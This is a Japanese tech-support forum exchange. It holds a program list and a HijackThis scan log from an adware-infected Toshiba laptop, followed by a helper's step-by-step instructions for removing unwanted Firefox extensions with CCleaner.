Intel(R) WiDi Intel Corporation 2012/04/24 139 MB 2.1.42.0
IObit Uninstaller IObit 2014/10/15 4.0.4.1
LAPLINK ヘルプデスク クライアント Intercom, Inc. 2012/04/24 1.22
LoiLoScope 2 LoiLo inc 2011/11/22 181 MB 2.0.3.1
Microsoft .NET Framework 4.5.1 (日本語) Microsoft Corporation 2014/03/06 2.93 MB 4.5.50938
Microsoft .NET Framework 4.5.2 Microsoft Corporation 2015/01/15 38.8 MB 4.5.51209
Microsoft Office 2010 Microsoft Corporation 2013/11/12 14.0.7015.1000
Microsoft Office ナビ 2010 Microsoft Corporation 2013/11/12 17.3 MB 14.0.7015.1000
Microsoft Primary Interoperability Assemblies 2005 Microsoft Corporation 2011/11/22 7.75 MB 9.0.21022
Microsoft Silverlight Microsoft Corporation 2014/07/24 249 MB 5.1.30514.0
Microsoft SQL Server 2005 Compact Edition [ENU] Microsoft Corporation 2011/11/22 1.69 MB 3.1.0000
Microsoft SQL Server Compact 3.5 SP2 ENU Microsoft Corporation 2012/04/24 3.39 MB 3.5.8080.0
Microsoft Visual C++ 2005 Redistributable Microsoft Corporation 2012/05/05 2.62 MB 8.0.59193
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 Microsoft Corporation 2011/11/22 788 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 Microsoft Corporation 2012/05/04 788 KB 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 Microsoft Corporation 2012/04/24 230 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 Microsoft Corporation 2011/11/22 596 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 Microsoft Corporation 2011/11/22 592 KB 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 Microsoft Corporation 2012/05/04 600 KB 9.0.30729.6161
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 Microsoft Corporation 2014/10/16 13.8 MB 10.0.40219
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 Microsoft Corporation 2014/10/16 15.0 MB 10.0.40219
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Microsoft Corporation 2014/10/16 10.0.50903
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - 日本語 Microsoft Corporation 2014/10/16 10.0.50903
Microsoft XNA Framework Redistributable 4.0 Microsoft Corporation 2014/09/29 8.03 MB 4.0.20823.0
MSXML 4.0 SP2 (KB954430) Microsoft Corporation 2014/11/16 1.27 MB 4.20.9870.0
MSXML 4.0 SP2 (KB973688) Microsoft Corporation 2014/11/16 1.33 MB 4.20.9876.0
MyEPSON Connect SEIKO EPSON Corporation 2012/05/05
NTT西日本 リモートサポートツール 西日本電信電話株式会社 2012/06/23
PCあんしん点検ユーティリティ TOSHIBA Corporation 2012/04/24 2.82 MB 1.1.3.0
PC引越ナビ 東芝情報機器株式会社 2011/11/22 12.7 MB 4.1.3
PhotoWizard Microsoft 2012/04/24 387 MB 1.0.0
PlayReady PC Runtime amd64 Microsoft Corporation 2011/11/22 2.05 MB 1.3.0
Realtek USB 2.0 Reader Driver Realtek Semiconductor Corp. 2012/04/24 1.0.0.7
Remote Desktop Access (VuuPC) CMI Limited 2014/08/11 1.0.0.0
Renesas Electronics USB 3.0 Host Controller Driver Renesas Electronics Corporation 2012/04/24 276 KB 2.0.34.1
RZプレーヤー CyberLink Corp. 2012/04/24 1.5.9508
SaverAddon SaverAddon 2014/11/15
Search Protect Client Connect LTD 2014/08/26 2.16.31.75
Sempre
Skype(TM) 7.3 Skype Technologies S.A. 2015/04/23 78.4 MB 7.3.101
Steam Valve Corporation 2014/09/29 2.10.91.91
Terraria Re-Logic 2014/09/29
TOSHIBA Bulletin Board TOSHIBA Corporation 2012/04/24 2.1.17.64
TOSHIBA ConfigFree TOSHIBA CORPORATION 2012/04/24 85.7 MB 8.0.42
TOSHIBA Disc Creator TOSHIBA Corporation 2012/04/24 11.0 MB 2.1.0.11 for x64
TOSHIBA ecoユーティリティ TOSHIBA Corporation 2012/04/24 18.8 MB 1.3.8.64
TOSHIBA Face Recognition TOSHIBA Corporation 2012/04/24 3.1.18.64
TOSHIBA Hardware Setup TOSHIBA 2012/04/24 4.08.09.00
TOSHIBA Manual TOSHIBA CORPORATION 2012/04/24 35.0 MB 0094.6404.2402
TOSHIBA Media Controller TOSHIBA CORPORATION 2012/04/24 1.0.87.4
TOSHIBA Media Controller Plug-in TOSHIBA CORPORATION 2012/04/24 6.65 MB 1.0.7.7
TOSHIBA PalaDouga TOSHIBA CORPORATION 2011/11/22 767 MB 2012.0101.0001
TOSHIBA PC Health Monitor TOSHIBA Corporation 2012/04/24 28.9 MB 1.7.11.64
TOSHIBA Peak Shift Control TOSHIBA Corporation 3.00.05.64
TOSHIBA Recovery Media Creator TOSHIBA CORPORATION 2011/11/22 2.1.5.5109a
TOSHIBA ReelTime TOSHIBA Corporation 2012/04/24 1.7.21.64
TOSHIBA Resolution+ Plug-in for Windows Media Player TOSHIBA Corporation 2012/04/24 1.1.2003
TOSHIBA SD-Video PLAYER TOSHIBA Corporation 2012/04/24 1.00.2.21-B
TOSHIBA Service Station TOSHIBA 2012/04/24 2.2.13
TOSHIBA Sleep Utility TOSHIBA Corporation 2012/04/24 1.4.2.9
TOSHIBA Speech Synthesis TOSHIBA CORPORATION 2012/04/24 65.0 MB 1.5.0.1
TOSHIBA Supervisor Password TOSHIBA 2012/04/24 4.08.09.00
TOSHIBA Sync Utility TOSHIBA Corporation 2011/11/22 2.0.3090
TOSHIBA Value Added Package TOSHIBA Corporation 2012/04/24 131 MB 1.6.16.64
TOSHIBA VIDEO PLAYER TOSHIBA Corporation 2012/04/24 45.9 MB 5.0.0.4-B
TOSHIBA Web Camera Application TOSHIBA Corporation 2012/04/24 65.2 MB 2.0.3.29
TOSHIBA Wireless Display Monitor TOSHIBA CORPORATION 2012/04/24 1.68 MB 1.0.1
TOSHIBA Wireless LAN Indicator TOSHIBA CORPORATION 2012/04/24 5.06 MB 1.0.5
TOSHIBA 無線LANらくらく設定 TOSHIBA CORPORATION 2011/11/22 18.2 MB 2.0.10.0628.1115n
UltraCoupon UltraCoupon 2014/02/22
Windows Live Essentials Microsoft Corporation 2011/11/22 15.4.3502.0922
Yahoo! Search Pay-By-Ads 2014/11/23
いつもNAVI PC ZENRIN 2011/11/22 6.1.2
おたすけナビ 東芝情報機器株式会社 2011/11/22 20.9 MB 6.1.3
おまかせフォトムービー TOSHIBA CORPORATION 2012/04/24 139 MB 1.1.2000.1
てぶらナビ TOSHIBA CORPORATION 2012/04/24 22.8 MB 1.5.1.5
インテル(R) PROSet/Wireless WiFi ソフトウェア Intel Corporation 2012/04/24 130 MB 14.01.1000
スタートアップツール 西日本電信電話株式会社 2012/06/23 2.60 MB 6.0
セキュリティ対策ツール 西日本電信電話株式会社 2015/04/27 450 MB 8.11
セキュリティ申込・設定ツール 西日本電信電話株式会社 2015/04/27 3.58 MB 7.1.0.7
レグザリンク・ダビング TOSHIBA CORPORATION 2012/04/24 1.0.11.1-A
動画で解決!操作ガイド 東芝情報機器株式会社 2011/11/22 15.9 MB 2.1.3
動画で解決!操作ガイド-コンテンツ- 東芝情報機器株式会社 2011/11/22 148 KB 2.1.3
東芝HDD/SSDアラータ TOSHIBA Corporation 2012/04/24 55.0 MB 3.1.64.9
東芝ピークシフトコントロール TOSHIBA Corporation 2012/04/24 3.00.05.64
東芝プレイス ダイジェストワード TOSHIBA CORPORATION 2012/12/16 7.40 MB 1.0.1
東芝プレイスガジェット TOSHIBA CORPORATION 2012/04/24 2.81 MB 3.0.3
東芝プレイスガジェット用ライブラリ TOSHIBA CORPORATION 2011/11/22 997 KB 2.0.0
筆ぐるめ Ver.19 富士ソフト株式会社 2011/11/22 587 MB 19.00.0000
診断復旧ツール 西日本電信電話株式会社 2014/05/07 12.5 MB


Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 20:17:32, on 2015/04/28
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.17728)


Boot mode: Normal

Running processes:
C:\Program Files (x86)\EPSON\MyEPSON Connect\mep.exe
C:\Program Files (x86)\TOSHIBA\ConfigFree\NDSTray.exe
C:\Program Files (x86)\TOSHIBA\widimon\widimon.exe
C:\Program Files (x86)\BUFFALO\clientmgrv\bin\cmvMain.exe
C:\Program Files (x86)\TOSHIBA\Sync Utility\TosSyncScheduler.exe
C:\Program Files (x86)\Intercom\LAPLINK HelpDesk Client\llhuser.exe
C:\Program Files (x86)\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe
C:\Program Files (x86)\Intercom\LAPLINK HelpDesk Client\llhrcusr.exe
C:\Program Files (x86)\EPSON Software\Event Manager\EEventManager.exe
C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSwMgr.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\windows\SysWOW64\cmd.exe
C:\windows\SysWOW64\cmd.exe
C:\Program Files\NTTW\Security\AMSP\module\20013\ChromeExt\chromeextension\TmopChromeMsgHost32.exe
C:\Program Files\NTTW\Security\AMSP\module\20002\9.0.1069\9.0.1069\chrome_extension2\host\chrome_native_msg_host.exe
C:\windows\SysWOW64\cmd.exe
C:\Program Files\NTTW\Security\SEC\UIFramework\Toolbar\chromeextension\NativeMessageHost\ToolbarNativeMsgHost.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Users\Owner\Downloads\HijackThis (2).exe

F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: E-Web Print - {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} - C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll
O2 - BHO: Trend Micro Toolbar BHO - {43C6D902-A1C5-45c9-91F6-FD9E90337E18} - C:\Program Files\NTTW\Security\SEC\UIFramework\ToolbarIE.dll
O2 - BHO: CTPBIEAddonBHO - {4C149F6B-ED35-42CC-979F-77006AFA4453} - C:\Program Files (x86)\Toshiba\Toshiba Places Digestword\TPBIEAddon.dll
O2 - BHO: Windows Live ID サインイン ヘルパー - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Trend Micro Osprey BHO - {959A5673-7971-48e6-AF54-58F745AC4ABC} - C:\Program Files\NTTW\Security\AMSP\module\20013\3.5.1186\2.0.1039\TmopIEPlg32.dll
O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\MICROS~4\Office14\URLREDIR.DLL
O2 - BHO: TmBpIeBHO - {BBACBAFD-FA5E-4079-8B33-00EB9F13D4AC} - C:\Program Files\NTTW\Security\AMSP\module\20002\9.0.1069\9.0.1069\TmBpIe32.dll
O2 - BHO: TOSHIBA Media Controller Plug-in - {F3C88694-EFFA-4d78-B409-54B7B2535B14} - C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll
O3 - Toolbar: E-Web Print - {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} - C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll
O3 - Toolbar: セキュリティツールバー - {CCAC5586-44D7-4c43-B64A-F042461A97D2} - C:\Program Files\NTTW\Security\SEC\UIFramework\ToolbarIE.dll
O4 - HKLM\..\Run: [TSUScheduler] %ProgramFiles(x86)%\TOSHIBA\Sync Utility\TosSyncScheduler.exe
O4 - HKLM\..\Run: [LLHDUSER] "C:\Program Files (x86)\Intercom\LAPLINK HelpDesk Client\llhuser.exe"
O4 - HKLM\..\Run: [TSleepSrv] %ProgramFiles(x86)%\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe
O4 - HKLM\..\Run: [ToshibaServiceStation] "C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe" /hide:60
O4 - HKLM\..\Run: [TouchFree] C:\Program Files (x86)\TOSHIBA\TouchFree\TouchFreeTray.exe
O4 - HKLM\..\Run: [ToshibaPlacesGadget] "C:\Program Files (x86)\Toshiba Places Gadget\ToshibaPlacesGadget.exe" -atboottime
O4 - HKLM\..\Run: [IME14 JPN Setup] C:\PROGRA~2\COMMON~1\MICROS~1\IME14\SHARED\IMEKLMG.EXE /SetPreload /JPN /Log
O4 - HKLM\..\Run: [EEventManager] "C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe"
O4 - HKLM\..\Run: [NTTW_OSA_AUS] "C:\Program Files (x86)\NTTW\OSA_Aus\acs.exe" -silent
O4 - HKCU\..\Run: [EPLTarget\P0000000000000000] C:\windows\system32\spool\DRIVERS\x64\3\E_IATIHKJ.EXE /EPT "EPLTarget\P0000000000000000" /M "PX-404A"
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - Global Startup: クライアントマネージャV.lnk = C:\Program Files (x86)\BUFFALO\clientmgrv\bin\cmvMain.exe
O8 - Extra context menu item: Microsoft Excel にエクスポート(&X) - res://C:\PROGRA~1\MICROS~2\Office14\EXCEL.EXE/3000
O8 - Extra context menu item: OneNote に送る(&N) - res://C:\PROGRA~1\MICROS~2\Office14\ONBttnIE.dll/105
O8 - Extra context menu item: TOSHIBA Bulletin Boardへ追加 - res://C:\Program Files\TOSHIBA\BulletinBoard\TosBBCom.dll/1000
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: OneNote に送る - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: OneNote に送る(&N) - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra button: 故障かな?と思ったら・・・ - {6CB1FA39-5745-4733-859F-E9C82A68F848} - C:\Program Files (x86)\NTTW\OSA_SupportTool\start_w.exe
O9 - Extra button: OneNote リンク ノート(&K) - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra 'Tools' menuitem: OneNote リンク ノート(&K) - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra button: @C:\Program Files\TOSHIBA\BulletinBoard\TosNcUi.dll,-229 - {97F922BD-8563-4184-87EE-8C4ACA438823} - C:\Program Files\TOSHIBA\BulletinBoard\TosBBCom.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files\TOSHIBA\BulletinBoard\TosNcUi.dll,-228 - {97F922BD-8563-4184-87EE-8C4ACA438823} - C:\Program Files\TOSHIBA\BulletinBoard\TosBBCom.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - Trusted Zone: http://dynabook.fresheye.com (HKLM)
O15 - Trusted Zone: http://www.ig.gmodules.com (HKLM)
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O16 - DPF: {53F4962A-8E27-4601-8B01-79A82B4D7FC9} (LoadPrg Class) - https://member.gungho.jp/front/member/webgs/LoadPrgAx.CAB
O17 - HKLM\System\CCS\Services\Tcpip\..\{9833B785-AB5F-4839-BF2F-DA06DA750E09}: NameServer = 218.176.253.97 218.176.253.65
O18 - Protocol: about - {3050F406-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysWOW64\mshtml.dll
O18 - Protocol: cdl - {3DD53D40-7B8B-11D0-B013-00AA0059CE02} - C:\Windows\SysWOW64\urlmon.dll
O18 - Protocol: dvd - {12D51199-0DB5-46FE-A120-47A3D7D937CC} - C:\Windows\SysWOW64\msvidctl.dll
O18 - Protocol hijack: file - {79EAC9E7-BAF9-11CE-8C82-00AA004BA90B}
O18 - Protocol hijack: ftp - {79EAC9E3-BAF9-11CE-8C82-00AA004BA90B}
O18 - Protocol hijack: http - {79EAC9E2-BAF9-11CE-8C82-00AA004BA90B}
O18 - Protocol: https - {79EAC9E5-BAF9-11CE-8C82-00AA004BA90B} - C:\Windows\SysWOW64\urlmon.dll
O18 - Protocol hijack: its - {9D148291-B9C8-11D0-A4CC-0000F80149F6}
O18 - Protocol: javascript - {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysWOW64\mshtml.dll
O18 - Protocol: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.dll
O18 - Protocol: local - {79EAC9E7-BAF9-11CE-8C82-00AA004BA90B} - C:\Windows\SysWOW64\urlmon.dll
O18 - Protocol: mailto - {3050F3DA-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysWOW64\mshtml.dll
O18 - Protocol: mhtml - {05300401-BCBC-11D0-85E3-00C04FD85AB4} - C:\windows\system32\inetcomm.dll
O18 - Protocol hijack: mk - {79EAC9E6-BAF9-11CE-8C82-00AA004BA90B}
O18 - Protocol: ms-help - {314111C7-A502-11D2-BBCA-00C04F8EC294} - (no file)
O18 - Protocol: ms-its - {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\windows\System32\itss.dll
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.dll
O18 - Protocol hijack: res - {3050F3BC-98B5-11CF-BB82-00AA00BDCE0B}
O18 - Protocol: tmbp - {1A77E7DC-C9A0-4110-8A37-2F36BAE71ECF} - C:\Program Files\NTTW\Security\AMSP\module\20002\9.0.1069\9.0.1069\TmBpIe32.dll
O18 - Protocol: tmop - {69FD7CE3-4604-4FE6-967C-49B9735CEE70} - C:\Program Files\NTTW\Security\AMSP\module\20013\3.5.1186\2.0.1039\TmopIEPlg32.dll
O18 - Protocol: tmtb - {04EAF3FB-4BAC-4B5A-A37D-A1CF210A5A42} - C:\Program Files\NTTW\Security\SEC\UIFramework\ToolbarIE.dll
O18 - Protocol: tmtbim - {0B37915C-8B98-4B9E-80D4-464D2C830D10} - C:\Program Files\NTTW\Security\SEC\UIFramework\ProToolbarIMRatingActiveX.dll
O18 - Protocol hijack: tv - {CBD30858-AF45-11D2-B6D6-00C04FBBDE6E}
O18 - Protocol: vbscript - {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysWOW64\mshtml.dll
O18 - Protocol: wlmailhtml - {03C514A3-1EFB-4856-9F99-10D7BE1653C0} - C:\Program Files (x86)\Windows Live\Mail\mailcomm.dll
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O18 - Filter hijack: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
O20 - AppInit_DLLs: c:\progra~2\searchprotect\searchprotect\bin\spvc32loader.dll
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Unknown owner - (no file)
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\windows\System32\alg.exe (file missing)
O23 - Service: Security Solution Platform (Amsp) - Trend Micro Inc. - C:\Program Files\NTTW\Security\AMSP\coreServiceShell.exe
O23 - Service: Baidu Japanese IME Service_3.5.2.45 (BaiduJP_IME_Service_3.5.2.45) - Unknown owner - (no file)
O23 - Service: BWH32S - BUFFALO INC. - C:\Program Files (x86)\BUFFALO\clientmgrv\bin\BWH32S.exe
O23 - Service: ConfigFree WiMAX Service (cfWiMAXService) - TOSHIBA CORPORATION - C:\Program Files (x86)\TOSHIBA\ConfigFree\CFIWmxSvcs64.exe
O23 - Service: CLHNService - Unknown owner - C:\Program Files (x86)\CyberLink\RZ Player\Kernel\DMP\CLHNService.exe
O23 - Service: ConfigFree プロファイルサービス (ConfigFree Service) - TOSHIBA CORPORATION - C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSvcs.exe
O23 - Service: CypherGuard cguard Service 32bit Edition - CypherTec Inc. - C:\Program Files (x86)\Common Files\CypherTec\cgrdsrv32.exe
O23 - Service: CypherGuard cguard Service 64bit Edition - CypherTec Inc. - C:\Program Files\Common Files\CypherTec\cgrdsrv64.exe
O23 - Service: CypherGuard Info Service - CypherTec Inc. - C:\Program Files\Common Files\CypherTec\cthwsrv64.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\windows\System32\lsass.exe (file missing)
O23 - Service: EPSON V3 Service4(04) (EPSON_PM_RPCV4_04) - SEIKO EPSON CORPORATION - C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S50RPB.EXE
O23 - Service: Intel(R) PROSet/Wireless Event Log (EvtEng) - Intel(R) Corporation - C:\Program Files\Intel\WiFi\bin\EvtEng.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\windows\system32\fxssvc.exe (file missing)
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: LiveUpdate (LiveUpdateSvc) - IObit - C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
O23 - Service: LLHDClient - Intercom, Inc. - C:\Program Files (x86)\Intercom\LAPLINK HelpDesk Client\LLHDClient.exe
O23 - Service: LLHDCloader - Intercom, Inc. - C:\Program Files (x86)\Intercom\LAPLINK HelpDesk Client\LLHDCldr.exe
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\windows\System32\msdtc.exe (file missing)
O23 - Service: MyEPSON Connect Service - SEIKO EPSON CORPORATION - C:\Program Files (x86)\EPSON\MyEPSON Connect\mepService.exe
O23 - Service: Wireless PAN DHCP Server (MyWiFiDHCPDNS) - Unknown owner - C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
O23 - Service: nProtect GameGuard Service (npggsvc) - Unknown owner - C:\windows\system32\GameMon.des.exe (file missing)
O23 - Service: Toshiba Places Digestword (PBExtractService) - TOSHIBA CORPORATION - C:\Program Files (x86)\Toshiba\Toshiba Places Digestword\PBExtractService.exe
O23 - Service: Platinum Host Service - Trend Micro Inc. - C:\Program Files\NTTW\Security\SEC\plugin\Pt\PtSvcHost.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: Protexis Licensing V2 (PSI_SVC_2) - Protexis Inc. - c:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe
O23 - Service: Intel(R) PROSet/Wireless Registry Service (RegSrvc) - Intel(R) Corporation - C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\windows\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: TMachInfo - TOSHIBA Corporation - C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe
O23 - Service: TOSHIBA Optical Disc Drive Service (TODDSrv) - Unknown owner - C:\windows\system32\TODDSrv.exe (file missing)
O23 - Service: TOSHIBA Power Saver (TosCoSrv) - TOSHIBA Corporation - C:\Program Files\Toshiba\Power Saver\TosCoSrv.exe
O23 - Service: TOSHIBA eco Utility Service - TOSHIBA Corporation - C:\Program Files\TOSHIBA\TECO\TecoService.exe
O23 - Service: TOSHIBA HDD SSD Alert Service - TOSHIBA Corporation - C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe
O23 - Service: TOSHIBA TosRzTf Control Service (TosRzTfSvc) - TOSHIBA Corporation - C:\Program Files (x86)\TOSHIBA\RegzaLinkDubbing\TosRzTfSvc.exe
O23 - Service: TPCHKarteSVC - TOSHIBA Corporation - C:\Program Files (x86)\TOSHIBA\TKRTL\TPCHKarteSVC.exe
O23 - Service: TPCH Service (TPCHSrv) - TOSHIBA Corporation - C:\Program Files\TOSHIBA\TPHM\TPCHSrv.exe
O23 - Service: UDSS - Unknown owner - c:\Program Files (x86)\Common Files\Ulead Systems\UDSS\UDSS.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\windows\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: Update Hold Page - Intel Corporation - (no file)
O23 - Service: Util Hold Page - Unknown owner - (no file)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 17405 bytes
  • T・T
  • 2015/04/28 (Tue) 20:18:39
CCで順番に処置します
作業と報告、ご苦労様です。
まだ異常も続いているようですね。
ですがログでだいぶ見えてきました。

ではまた説明を読んでから、続きの作業をお願いします。
ちょっと数が多いので、間違えないようにひとつずつ確実に見て進めてください。

skypeについてはいまは置いときます。これは後でまた指示します。

まず、先の要領でCCを起動して「Firefox」タブ内の下記を右クリックから「無効」にしたあと続けて「エントリの削除」してください。
>有効 Extension Browsers Apps 0.95.18 browser default C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\extensions\herman.thorne45@outlook.com

>有効 Extension ClickForSale 1.9 default C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\extensions\Na@4skpeF6a.org

>有効 Extension Hold Page 1.0.1 Hold Page default C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\extensions\{15738250-181b-41cd-b01d-621a833a541c}.xpi

>有効 Extension ProShopper 4.87 default C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\extensions\w1@bVfSQOc5.com

>有効 Extension SilentBlockschuzakjp 0.95.949 Schuzak default C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\extensions\SilentBlock@schuzak.jp

>有効 Extension websaver 6.2 default C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\extensions\vN6lrq0@I.org

無効化できないものはそのまま削除でもいいです。
ただし、上記のうちご自身で必要として入れたものは削除は保留して、次回レスでその旨教えてください。
覚えもないのに入っていたものなら遠慮なく削除でいいです。
対象外の物は間違っていじらないようによく見て作業を!

